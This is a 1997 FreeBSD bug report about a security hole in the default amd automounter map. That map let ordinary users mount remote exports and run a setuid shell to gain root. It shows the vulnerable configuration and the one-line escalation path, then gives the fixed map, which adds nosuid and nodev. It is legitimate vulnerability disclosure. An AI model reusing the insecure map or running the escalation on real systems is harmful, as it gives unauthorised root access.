From watanabe@crayon.planet.kobe-u.ac.jp  Wed Jun 11 00:23:55 1997
Received: from crayon.planet.kobe-u.ac.jp (crayon.planet.kobe-u.ac.jp [133.30.50.177])
          by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id AAA07322
          for <FreeBSD-gnats-submit@freebsd.org>; Wed, 11 Jun 1997 00:20:05 -0700 (PDT)
Received: (from watanabe@localhost) by crayon.planet.kobe-u.ac.jp (8.8.5/3.5Wpl7-sub) id QAA26419; Wed, 11 Jun 1997 16:14:06 +0900 (JST)
Message-Id: <199706110714.QAA26419@crayon.planet.kobe-u.ac.jp>
Date: Wed, 11 Jun 1997 16:14:06 +0900 (JST)
From: Takeshi WATANABE <watanabe@crayon.planet.kobe-u.ac.jp>
Reply-To: watanabe@komadori.planet.kobe-u.ac.jp
To: FreeBSD-gnats-submit@freebsd.org
Subject: The sample /etc/amd.map has a security hole.
X-Send-Pr-Version: 3.2

>Number:         3846
>Category:       misc
>Synopsis:       The sample /etc/amd.map has a security hole.
>Confidential:   no
>Severity:       critical
>Priority:       high
>Responsible:    freebsd-bugs
>State:          closed
>Quarter:
>Keywords:
>Date-Required:
>Class:          change-request
>Submitter-Id:   current-users
>Arrival-Date:   Wed Jun 11 00:30:01 PDT 1997
>Closed-Date:    Sun Nov 9 21:24:42 PST 1997
>Last-Modified:  Sun Nov  9 21:25:22 PST 1997
>Originator:     Takeshi WATANABE
>Release:        FreeBSD 2.2.1-RELEASE i386
>Organization:
Kobe University, Kobe, Japan
>Environment:

	All machines which use "amd" with the default /etc/amd.map

>Description:

  The default /etc/amd.map has a serious security hole.

=-=-=-=
/defaults   type:=host;fs:=${autodir}/${rhost};rhost:=${key}
*           opts:=rw,grpid
=-=-=-=

  If we use this map file,  non-privileged user can mount any remote file
systems that the remote machines export.  If the remote file system contains
dangerous SetUID excutable files or world-writable device files, the
non-pricileged user can excute or read it.  So, he/she can easily get root
authority.

  When the "amd" mount point of this map file is "/net",  the cracker can
become root, only he/she execute following.

	/net/crackers.host.machine/.../setuid-shell

(where crackers.host.machine exports /...)

>How-To-Repeat:

	Always.

>Fix:

  We should change /etc/amd.map!  Following lines are one sample.

=-=-=-=
/defaults          type:=host;fs:=${autodir}/${rhost};rhost:=${key}
#my.friend.machine opts:=rw,grpid
*                  opts:=rw,grpid,nosuid,nodev
=-=-=-=

We should use "nosuid" and "nodev" for "*".

       =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
              Takeshi WATANABE (watanabe@komadori.planet.kobe-u.ac.jp)
                            Graduate School of Science and Technology,
                               Kobe University   Nada, Kobe 657, Japan
>Release-Note:
>Audit-Trail:
State-Changed-From-To: open->closed 
State-Changed-By: jkh 
State-Changed-When: Sun Nov 9 21:24:42 PST 1997 
State-Changed-Why:  
Fix applied, thanks! 
>Unformatted:
